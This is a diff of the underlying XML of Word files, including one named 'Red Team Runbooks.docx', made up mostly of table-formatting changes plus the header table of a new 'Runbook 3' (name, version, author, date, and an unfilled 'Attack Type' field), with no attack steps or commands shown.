               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2686,13 +2649,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -2703,8 +2666,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -2716,15 +2679,15 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2744,7 +2707,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2752,7 +2715,7 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2772,14 +2735,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2804,14 +2767,14 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2023" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2831,14 +2794,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6335" w:type="dxa"/>
+            <w:tcW w:w="6336" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="left"/>
@@ -2866,13 +2829,13 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1287" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl/>
+            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
               <w:bidi w:val="0"/>
               <w:spacing w:before="0" w:after="160"/>
               <w:jc w:val="center"/>
@@ -2883,8 +2846,8 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
               </w:rPr>
             </w:r>
           </w:p>
@@ -2909,6 +2872,7 @@
       <w:pgNumType w:fmt="decimal"/>
       <w:formProt w:val="false"/>
       <w:textDirection w:val="lrTb"/>
+      <w:docGrid w:type="default" w:linePitch="100" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
@@ -2928,7 +2892,6 @@
     </w:rPrDefault>
     <w:pPrDefault>
       <w:pPr>
-        <w:widowControl/>
         <w:suppressAutoHyphens w:val="true"/>
       </w:pPr>
     </w:pPrDefault>
@@ -2938,7 +2901,10 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
       <w:bidi w:val="0"/>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:jc w:val="left"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans"/>

--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1529"/>
-        <w:gridCol w:w="493"/>
+        <w:gridCol w:w="1528"/>
+        <w:gridCol w:w="494"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1756"/>
-        <w:gridCol w:w="1286"/>
+        <w:gridCol w:w="1757"/>
+        <w:gridCol w:w="1285"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -502,7 +502,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1529" w:type="dxa"/>
+            <w:tcW w:w="1528" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -549,7 +549,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8115" w:type="dxa"/>
+            <w:tcW w:w="8116" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -609,7 +609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -637,7 +637,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -696,7 +696,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -763,7 +763,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -821,7 +821,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -849,7 +849,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -908,7 +908,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -999,7 +999,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1057,7 +1057,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1085,7 +1085,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1144,7 +1144,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1171,7 +1171,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1229,7 +1229,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -1257,7 +1257,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1316,7 +1316,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -1351,7 +1351,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -1466,12 +1466,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1529"/>
-        <w:gridCol w:w="493"/>
+        <w:gridCol w:w="1528"/>
+        <w:gridCol w:w="494"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1756"/>
-        <w:gridCol w:w="1286"/>
+        <w:gridCol w:w="1757"/>
+        <w:gridCol w:w="1285"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -1931,7 +1931,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1529" w:type="dxa"/>
+            <w:tcW w:w="1528" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -1978,7 +1978,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8115" w:type="dxa"/>
+            <w:tcW w:w="8116" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2038,7 +2038,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2066,7 +2066,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2125,7 +2125,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2172,7 +2172,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2230,7 +2230,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2258,7 +2258,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2317,7 +2317,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2393,7 +2393,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2451,7 +2451,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2479,7 +2479,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2538,7 +2538,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2649,7 +2649,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -2707,7 +2707,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -2735,7 +2735,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -2794,7 +2794,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6336" w:type="dxa"/>
+            <w:tcW w:w="6337" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -2829,7 +2829,1373 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1286" w:type="dxa"/>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:sz w:val="56"/>
+          <w:szCs w:val="56"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="56"/>
+          <w:szCs w:val="56"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Runbook </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="56"/>
+          <w:szCs w:val="56"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="9645" w:type="dxa"/>
+        <w:jc w:val="left"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1528"/>
+        <w:gridCol w:w="494"/>
+        <w:gridCol w:w="2290"/>
+        <w:gridCol w:w="2290"/>
+        <w:gridCol w:w="1757"/>
+        <w:gridCol w:w="1285"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="497" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Document Name</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">IRTx Red Run </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Version</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>V1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="417" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Author</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Dylan Wondal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2290" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Date Created</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3042" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>9/10/23</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="411" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Attack Type</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
